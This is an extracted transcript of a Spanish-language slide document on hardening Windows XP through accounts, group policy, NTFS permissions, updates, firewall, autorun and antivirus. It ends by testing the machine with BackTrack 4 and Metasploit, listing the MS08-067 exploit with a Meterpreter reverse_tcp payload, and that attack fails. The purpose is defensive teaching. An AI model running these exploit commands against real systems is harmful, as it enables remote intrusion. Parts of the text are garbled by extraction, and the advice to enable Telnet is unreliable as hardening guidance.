Windows Indestructible Atacado Con Backtrak
-
Upload
angelica-tomala-torres -
Category
Documents
-
view
229 -
download
0
Transcript of Windows Indestructible Atacado Con Backtrak
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
1/38
Windows indestructible atacado con Backtrak, su evaluacin y
Proteccin.
Como primer paso procedemos a la verificacin del Service Pack que se encuentrainstalado en la maquina.
A continuacin comenzamos a instalar las nuevas actualizaciones desde el Windows
Update(para esto damos click en: inicio, todos los programas, Windows Update).
Nos aparecer la siguiente ventana
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
2/38
En este momento procedemos hace la configuracin para hacer el
Windows indestructible
1.- Configuracin de usuarios
Click derecho en MI PC
Administrar
Administracin del equipo (local)
Herramienta del sistema
Usuarios locales y grupoUsuarios
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
3/38
La cuenta Administrador debe cambiar el nombre y poner contrasea y la cuenta que es
usuario debe ser tipo Usuarios
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
4/38
Ahora procedemos al usuario cambiarle el tipo de cuenta, hay que ponerle tipo Usuarios
Eliminamos Tipo Administradores y agregamos tipo Usuarios, Aplicar y Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
5/38
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
6/38
Cambiar el modo de inicio de sesin:
Abrir Panel de Control
Cuentas de Usuarios
Cambiar forma en que los Usuarios inician sesin
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
7/38
Desmarcar las 2 opciones
Presionar Aplicar opciones
Impedir mostrar el ultimo usuario que utilizo la mquina
Inicio
Ejecutar
Escribir gpedit.msc
EscogerDirectiva Equipo Local
Configuracin del equipoConfiguracin de Windows
Configuracin de Seguridad
Directivas localesOpciones de seguridad
Buscamos : Inicio de sesin interactivo: no mostrar el ultimo nombre de usuarioClick derecho Propiedades
Marcamos Habilitado, Aplicar y Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
8/38
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
9/38
Para mostrar un mensaje al intentar iniciar sesin
InicioEjecutar
Escribir gpedit.mscEscogerDirectiva Equipo Local
Configuracin del equipo
Configuracin de WindowsConfiguracin de SeguridadDirectivas locales
Opciones de seguridad
Buscamos : Inicio de sesin interactivo: texto del mensaje para los usuarios que intentan
iniciar sesin
Click derecho Propiedades
Escribimos el mensaje, Aplicar y Aceptar
Bloqueo de cuentasInicio
Ejecutar
Escribir gpedit.msc
EscogerDirectiva Equipo Local
Configuracin del equipoConfiguracin de Windows
Configuracin de SeguridadDirectivas de Cuenta
Directivas de contraseas .- donde hay opciones para restringir la seguridad en una
contrasea
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
10/38
Directivas de bloqueo de cuentas .- permite bloquear la cuenta segn las Directivas de
contraseas
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
11/38
Al cerrar nos quedar algo como esto:
2. Administrar los permisos NTFSAbrir Mi PC
Seleccionar Opciones de carpetaEn la pestaa Ver
Desmarcar Utilizar uso compartido simple de archivos (recomendado)
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
12/38
Click derecho en la unidad C:Compartir y Seguridad
Nuevo recurso compartidoEscribir el nombre del Recurso
Presionar Permisos
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
13/38
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
14/38
Presionar AgregarEscribir el nombre de Usuario y Comprobar nombres, Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
15/38
Vamos a la pestaa Seguridad
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
16/38
Solo tenemos q tener sealadas las pestaas q se muestran:
Damos click en Opciones avanzadas
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
17/38
Modificamos todo lo de Usuarios para que NO puedan escribir, NO puedan crear
carpetas, NO puedan crear archivos, NO puedan borrar, SOLO leer.Aplicar y Aceptar
Ahora compartir la carpeta Administrador para que lo puedan ver los dems usuarios
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
18/38
Presionamos el botn Permisos
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
19/38
Presionamos Agregar
Escribimos el nombre Usuarios y Comprobamos nombres, Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
20/38
Vamos a la pestaa SeguridadRealizamos los mismos pasos que hicimos en para compartir el disco duro en esta
pestaa
Estamos en el usuario y queremos escribir algo o crear carpetas y NO podemos, SOLO
se puede dentro de la carpeta del usuario.
4. Activacin de la Actualizaciones de WindowsInicio
EjecutarEscribir sysdm.cpl
Clic en Actualizaciones Automticas
Se recomienda seleccione:
Automtico (recomendado) Descargar automticamente las actualizaciones
recomendadas para mi equipo e instalarlas.
El tiempo de ejecucin lo puedo elegir desde una pestaa desplegable.
Si se elige esta opcin Windows reconoce si est conectado y utiliza la conexin
a Internet para buscar las actualizaciones en Windows Update Web; se actualiza
de fondo y en el proceso no se notifica ni interrumpe, slo aparece un icono en el
rea de notificacin de la barra de tareas cuando las actualizaciones se estn
descargando.
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
21/38
Pero existe tambin 2 opciones ms que se pueden elegir: Descargar actualizaciones por m, pero permitirme elegir cuando instalarlas
Si se elige esta opcin Windows reconoce si est conectado y utiliza la conexina Internet para buscar las actualizaciones en Windows Update Web; en el
proceso no se notifica ni interrumpe, slo aparece un icono en el rea de
notificacin de la barra de tareas cuando las actualizaciones se estn
descargando.
Una vez que finaliza la descarga aparece una notificacin de que ha finalizado la
descarga, y se pueden revisar las actualizaciones.
Notificar pero no descargar o instalarlas automticamente
Si se elige esta opcin Windows reconoce si est conectado y utiliza la conexin
a Internet para buscar las actualizaciones en Windows Update Web; y aparece en
el icono en el rea de notificacin de la barra de tareas que hay actualizaciones
disponibles para descragar e instalar.
Una vez elegido el tipo de Actualizacin, Aplicar y Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
22/38
5. Configuracin Firewall de Windows
Inicio
Panel de Control
Firewall o tambin Centro de Seguridad, Firewall
En la pestaa General tenemos:
- Si queremos elegir un Firewall sin excepciones solo elegimos:
Activado (recomendado)
No permitir excepciones
Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
23/38
- Si queremos un Firewall con excepciones
Activado (recomendado)Y la casilla No permitir excepciones, debe estar desmarcada
Aceptar
En la pestaa Excepciones marcar: Mostrar una notificacin cada vez que Firewall de
Windows bloquee un programa.
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
24/38
Tambin en esta pestaa cuando queremos un Firewall con excepciones podemos
escoger los programas a los que se les dar permiso, si el programa no se encuentra enla lista lo podemos escoger de la siguiente manera:
Click en Agregar programa
Si el programa no se encuentra en la lista damos click en ExaminarY buscamos el programa, Aceptar
Una parte opcional es: Cambiar mbito
Esta opcin nos permite especificar los equipos que queremos que utilicen el programaexceptuado en mi equipo.
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
25/38
Otra opcin en la pestaa Excepciones es una Excepcin de puertos, y para estorealizamos lo siguiente:
Click en Agregar puertoPodemos escribir el Nombre del puerto y el Nmero del puerto
Despus Aceptar y est configurado el Firewall con excepciones.
6. Activacin y desactivacin de Servicios y Protocolos
Para Activar y desactivar los serviciosNos vamos a Panel de Control
Herramientas administrativas
Servicios
Ah podeos escoger el servicio que deseamos activarlo o desactivarlo
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
26/38
En este caso vamos activar el Servicio de Telnet
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
27/38
Y damos clip en Iniciar y se va activar el servicio
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
28/38
7. Desactivar el autorun
InicioEjecutar
Escribimos gpedit.mscEn el rbol: Directiva de equipo local >Configuracin del equipo > Plantillas
administrativas > Sistema
Escoger en la ventana de la derecha: Desactivar reproduccin automticaClick derecho, Propiedades
Escoger Habilitar y elegir en Desactivar reproduccin automtica en: Todas las
unidades
Aplicar, Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
29/38
Para que no puedan detectar los pendrive USBInicio
EjecutarRegedit
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
Start=dword:000000033 = Activado4 = Desactivado
8. Instalacin y configuracin de Anti-virus
Descargamos el anti-virus AVG
Lo instalamos siguiendo el ayudante de instalacin
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
30/38
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
31/38
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
32/38
9. Navegador web con filtro de phishing
Para tener este filtro utilizamos el SmartScreen de Internet Explorer 8 (IE8), que es unaherramienta anti-phishing llamada as en el Internet Explorer 7.
Phishing
Es un tipo de delito dentro del mbito de las estafas informticas caracterizado porintentar adquirir informacin confidencial de forma fraudulenta por ejemplo una
contrasea, informacin detallada sobre tarjeta de crdito u otra informacin bancaria,
datos personales, es decir se realiza el robo de identidad.
SmartScreen como acta
Si un usuario visita un sitio que ha sido etiquetado como fraudulento o contiene
software malicioso, entonces IE8 mostrar un aviso de eso recomendando que el sitio
no deba ser visitado.Tambin revisa los enlaces de descarga de archivos para evitar la instalacin o
ejecucin de archivos provenientes de sitios peligrosos.
Mantener activo el filtro
Inicio
EjecutarEscribir gpedit.msc
Directiva Equipo local
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
33/38
Configuracin de usuario
Plantillas administrativasComponentes de Windows
Internet ExplorerEn el rbol derecho escogemos: Desactivar la administracin del filtro SmartScreen
PropiedadesEscoger Habilitada y elegir en Seleccionar modo de filtro SmartScreen: Activar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
34/38
Dentro de la carpeta Internet Explorer
Panel de Control de InternetEn el rbol derecho escogemos: Deshabilitar la pgina de Seguridad
Propiedades
Escoger Habilitada, Aplicar y Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
35/38
Vemos que l s opciones esaparecen y no se pueden modi icar
10. Acti seguri de registro de Wi dows
------ Para impedir que el usuario cambie la hora del sistema
Inicio
Ejecutar
Escribir gpedit msc
irecti a Equipo local
Configuraci n del equipo
Configuraci n de Windows
Configuraci n de seguridad
irecti as locales
Asignaci n de derechos de autor
En el rbol derecho escogemos:Cambiarla hora del sistema
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
36/38
Propiedades
Solo debe estar Administradores, si existe otro grupo lo quitamos, as como tambin
podemos agregar un determinado grupo
Aplicar. Aceptar
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
37/38
Realizacin de ataque informtico con Backtrak 4
En el Shell de backtrak escribimos
1. /pentest/exploits/framework32.
./msfconsole
Este es el entorno visual del programa ahora, vamos a llamar al exploit que utilizaremos:
use exploit/windows/smb/ms08_067_netapi.
Procedemos a escribir los comandos Lhost I
PATACANTE Ejemplo Lhost 192.16.1.4 y
Rhost IP VICTIMA Ejemplo Rhost 192.16.1.3.
seleccionamos el payload:
set PAYLOAD windows/meterpreter/reverse_tcp
ahora ejecutamos el exploit:
exploit
Al poco tiempo veremos si nos hemos conectado a la victima:
En este caso no se pudo realizar el ataque ya que al correr el exploit manda el mensaje que
no fue creada la sesin exploit completed but no sessin was createdy cumplimos con
nuestro objetivo de proteger el Windows.
-
8/7/2019 Windows Indestructible Atacado Con Backtrak
38/38
Si se hubiera creado la sesin nos aparecera el mensaje meterpreter sesin 1
opened.osea que la sesin fue creada como nos muestra en la siguiente figura.